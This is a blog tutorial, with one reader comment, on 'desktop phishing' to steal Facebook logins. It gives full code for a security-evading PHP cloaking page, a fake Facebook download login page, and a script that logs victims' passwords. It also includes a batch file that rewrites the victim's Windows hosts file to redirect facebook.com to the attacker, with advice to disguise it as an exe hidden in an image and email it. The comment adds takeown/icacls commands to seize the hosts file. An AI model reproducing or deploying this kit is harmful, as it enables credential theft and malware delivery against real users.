Share it

       
   

Friday, 10 July 2015

Advanced Level Facebook Desktop Phishing Method - 2015 (Undetectable)

1 comment :


As I’ve mentioned in my previous article, in this post we will be exploring a bit of batch file programming and then will move ahead implementing that in facebook hacking by desktop phishing. The advantage here is, the victim will not be able to identify the fake page since the URL in the address looks similar to the genuine one and this post is including a new php code for making phishing page that is undetectable and can bypass security check of a hosting site.

This tutorial would be a non-exhaustive guide for beginners. If you have not read my previous articles “DNS Hijacking” and “Hacking facebook accounts using phishing” then I might ask you to read it before continuing reading this further, since that would give you a prerequisite knowledge upon the topics that we are going to discuss today

Difference between phishing and desktop phishing


In phishing 

1. Attacker convinces the victim to click on the link of fake login page which resembles a genuine login page.


2.Victim enters his credentials in fake login page that goes to attacker.

3. Victim is then redirected to an error page or genuine website depending on attacker.

But main drawback in phishing is that victim can easily differentiate between fake and real login page by
looking at the domain name. We can overcome this in desktop phishing by spoofing domain name.


In desktop phishing

1. Attacker sends an executable file to victim and victim is supposed to double click on it. Attacker's job is done.

2. Victim types the domain name of orignal/genuine website and is taken to our fake login page.

But the domain name remains the same as typed by victim
and victim doesn't come to know.

3. Rest of the things are same as in normal phishing.


What is Hosts File?


The hosts file is a text file containing domain names and IP address associated with them.
Location of hosts file in windows: C:\Windows\System32\drivers\etc\, Whenever we visit any website, say www.anything.com , an query is sent to Domain Name Server(DNS) to look up for the IP address associated with that website/domain. But before doing this the hosts file on our local computer is checked for the IP address associated to the domain name.

Suppose we make an entry in hosts file as shown. When we visit www.anywebsite.com , we would be taken to this 115.125.124.50. No query for resolving IP address associated with www.anywebsite.com would be sent to DNS.



What is the attack?


I hope you have got an idea that how modification of this hosts file on victim's computer can be misused.
We need to modify victim's hosts file by adding the genuine domain name and IP address of our fake website /phishing page.Whenever victim would visit the genuine website , he would be directed to our fake login page and domain name in the URL box would remain genuine as typed by victim. Hence domain name is spoofed.



Steps to perform attack:


Step 1. Making undetectable phishing page



What you need :

Notepad++
 for programming (Download : http://www.notepad-plus-plus.org/download)

Steps :

Use Notepad++ for the steps given below

1) Copy this code and paste it in a new document and save it as index.php

<?php
$id = $_GET["id"];
if ($id == "facebookforwindows") {
$myFile = "SoftwareDownload.jpg";
$fh = fopen($myFile, 'r');
$theData = fread($fh, 500000);
fclose($fh);
echo $theData;
}

else{
$myFile1 = "Follow.jpg";
$fh1 = fopen($myFile1, 'r');
$theData1 = fread($fh1, 500000);
fclose($fh1);
echo $theData1;
}
?>



Note : Change “($id == “facebookforwindows”)” with “($id == “YOUR_PASSWORD”)“

(You can put any password as YOUR_PASSWORD)

2) Copy below code and paste it in a new document and save it as Follow.jpg (Code Not By ME)



<!DOCTYPE html>
<html>
 <head>
  <title>Find your Facebook ID - a 5-second easy tool for locating your Facebook numeric personal ID</title>
  <meta name="description" content="If you need to know your Facebook numeric peronal ID, just plug your Profile URL into this simple tool." />
  <link rel="stylesheet" href="reset.css" type="text/css" media="screen">
  <link rel="stylesheet" href="style.css" type="text/css" media="screen">

 <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script>  <script src="script.js" type="text/javascript" charset="utf-8"></script>
  <meta property="fb:admins" content="1146295886" />
 </head>
 <body>
   
  <form action="" method="post">

 <label for="fb_profile_url" class="text-input-label fb_profile_url-text-input-label">
  Enter your personal Facebook profile URL:
 </label>

 <input type="text" name="fb_profile_url" value="" class="nr-text" size="45" placeholder="http://www.facebook.com/YourProfileName" />
 <input type="hidden" name="unsanitized" class="nr-hidden hidden-input-for-unsanitized" />
 <p>
  <input type="submit" value="Lookup numeric ID..." class="button-primary">
 </p>

 <h1>Easily find your Facebook numeric personal ID for fb:admins social plugins and more!</h1>

 <p id="description">
  For integrations of certain Facebook social plugins, like the "Like" button and "Like box", and others, Facebook
  requires that you know your Facebook numeric user ID.  Unfortunately, they make this very difficult to find, especially
  if you have a so-called "vanity" personalized profile URL. If you can't find your Facebook ID, or don't know what it is
  and need it, just enter your full Facebook profile URL in the above form, and we can scrape the ID from the code of your
  personal profile page. 
 </p>

</form> 

<script type="text/javascript">
  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-3361652-13']);
  _gaq.push(['_trackPageview']);
  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();
</script>
 </body>
</html>


3) Copy this code and paste it in a new document and save it as data.php
<?php
header ('Location:https://www.facebook.com/');
$handle = fopen("PassFace.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "rn");
}
fwrite($handle, "rn");
fclose($handle);
exit;
?>

4) Copy this code and paste it in a new document and save it as SoftwareDownload.jpg


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Facebook For Windows : Welcome</title>
<style type="text/css">
html, body
{
   height: 100%;
}
div#space
{
   width: 1px;
   height: 50%;
   margin-bottom: -360px;
   float:left
}
div#container
{
   width: 1250px;
   height: 720px;
   margin: 0 auto;
   position: relative;
   clear: left;
}
</style>
<style type="text/css">
body
{
   margin: 0;
   padding: 0;
   background-color: #6579A8;
   color: #000000;
}
</style>
<style type="text/css">
h3
{
   font-family: Arial;
   font-size: 24px;
   font-weight: normal;
   font-style: normal;
   text-decoration: none;
   color: #000000;
   margin: 0 0 0 0;
   padding: 0 0 0 0;
   display: inline;
}
a:hover
{
   color: #90F518;
}
</style>
<!--[if lt IE 7]>
<style type="text/css">
   img { behavior: url("pngfix.htc"); }
</style>
<![endif]-->
</head>
<body>
<div id="space"><br></div>
<div id="container">
<div id="bv_Image1" style="margin:0;padding:0;position:absolute;left:0px;top:0px;width:1093px;height:609px;text-align:left;z-index:0;">
<img src="images/Facebook_Box.png" id="Image1" alt="" align="top" border="0" style="width:1093px;height:609px;"></div>
<div id="bv_Image2" style="margin:0;padding:0;position:absolute;left:207px;top:210px;width:168px;height:168px;text-align:left;z-index:1;">
<img src="images/Facebook.png" id="Image2" alt="" align="top" border="0" style="width:168px;height:168px;"></div>
<div id="bv_Text1" style="margin:0;padding:0;position:absolute;left:378px;top:224px;width:389px;height:90px;text-align:left;z-index:2;">
<h3>Download Facebook For Windows :<br>
</h3><font style="font-size:13px" color="#000000" face="Arial">size : 6 MB.<br>
Platform : Windows 8.1<br>
Security Status : Active</font><h3><br>
</h3></div>
<div id="Html1" style="position:absolute;left:378px;top:307px;width:625px;height:50px;z-index:3">
<b>Login to Donwload this Application :</b><br/>
<form name="input" action="data.php" method="post">
Username : <input type="text" name="username" />
Password : <input type="password" name="password">
<input type="submit" value="Download" action="data.php" method="post"/>
</form></div>
</div>
</body>
</html>
5) Keep all above files in a single folder and name it as “xyz” (Anything you want)

6) Now create a folder inside that folder (“xyz“) and name it as “images” (Put exact name)

7) Download these images and put it inside “images

Image 1 : http://adf.ly/1IK1UU
Image 2 : http://adf.ly/1IK1ah

Now if you followed all the steps carefully, It will look similar to this :


You are successfully created the phishing page and We need this files in next steps.


Step 2. Setting up Xampp web server


You can use wamp or xammp , i would recommend you to use xammp and this software will help you to host phishing on your local machine.

Web server can refer to either the hardware (the computer) or the software (the computer application) that helps to deliver Web content that can be accessed through the Internet.


S/W : xampp Server

1) First Download and install xampp on your PC, Start Apache and Msql services


2) Copy the 5 files (including the foldr named 'images') we are created in step 1, and paste its all in ht docs folder which should be under Xammp (place were you installed xampp)
(normally ht docs folder should be in the path: c:\xampp\htdocs)



Step 3. Setting up static vpn

I will Use proXPN VPN for this Tutorial but i recommend you to use Strong Open VPN as it is very stable you can download it from here.

Install ProXPN VPN or any other static VPN, i recommend you to use Strong Vpn as it very stable and gives you a static IP Once you install and run it, you will get a static IP (vpn).



Now you have a static ip for your Localhost.


Step 4. Creating a batch(.bat) file to accomplish replacing victims hosts file

Now we have to replace some text in the victims Host file which is atC:\windows\system32\drivers\etc ,You can do this by many ways either by using a SFX archive or using a batch file for this tutorial we will use a batch file to accomplish the job.

Here is the batch program that I was talking about in my last post 'DNS hijacking'. As we have seen that, adding an IP address with a corresponding domain name in the host file would redirect you to webpage as you desire with a desired domain name.

So, we are going to take this into next level for hacking purposes. We’ll change the host file in the victim machine with the help of a batch program and redirect the victim to our fake login page. The only thing you need to consider is sending the batch program to the victim machine and running it.

Here is the batch program that can be used to manipulate the HOSTS file.

@echo off
set hostspath=%windir%\System32\drivers\etc\hosts

echo 62.116.159.4 www.facebook.com >> %hostspath%
echo 62.116.159.4 www.fb.com >> %hostspath%
echo 62.116.159.4 https://www.facebook.com >> %hostspath%
echo 62.116.159.4 https://fb.com >> %hostspath%

exit

Replace the ip address(62.116.159.4) with the static IP address of your vpn (The static ip vpn address you got in step 3), and save it as 'anyname.bat'.

Let us now discuss what exactly the above code does. The second line of the code above takes the admin privileges over the ‘hosts’ file, so that editing can be done. Then we move into the path where the ‘hosts’ file is located and then we write 4 lines into the file. Those lines of codes are responsible for the redirection of the user. Therefore, we try to redirect all the possible combinations of facebook addresses to the IP that is provided.

Remember, executing the above code containing file in the victim’s machine is your personal concern and hence I’m not describing the methodologies of spreading your code.



Step 5. Sending the file to victim

You can also change the .bat file into .exe file using batch to exe converter. Click the link to learn how to convert a batch file into an executable.

After successfully converted to anyname.exe file you can do one more step to hide this .exe file in an image file, follow my previous guide: 
How To Make A Virus And Hide In An Image File (FUD)

Now send the file via email or upload the file to a site and ask the victim to download the file , After the victim downloads and clicks the file, his host file will be replaced ,So now when ever the victim enters facebook.com He will be redirected to our Phisher Page, But the URL will remain as Facebook.com

To see all the victims credentials and Password open newly created log.txt file which is under ht docs folder


You are done.

1 comment :

  1. Hy Friend,

    Well written and well explained. Great work but here is a little and a big problem, you can't edit hosts file without administrator privileges. The batch file programming you have mentioned above does not do the job in Windows Vista, 7 , 8 , 8.1 (I've tried on 8.1). So due to your hard work on this tutorial I decided to help you in this matter. Here is mine working code:


    @echo off

    takeown /f C:\Windows\System32\drivers\etc\hosts && icacls C:\Windows\System32\drivers\etc\hosts /grant administrators:F
    set hostspath=%windir%\System32\drivers\etc\hosts

    echo 62.116.159.4 www.facebook.com >> %hostspath%
    echo 62.116.159.4 www.fb.com >> %hostspath%
    echo 62.116.159.4 https://www.facebook.com >> %hostspath%
    echo 62.116.159.4 https://fb.com >> %hostspath%

    exit

    Put it in batch file then convert that batch into exe using Bat to Exe converter (be sure to tick Add Administrator Manifest in Bat to exe converter or it will not work.)

    Downloadind link:
    http://www.f2ko.de/en/b2e.php

    Thank you for your attention.

    ReplyDelete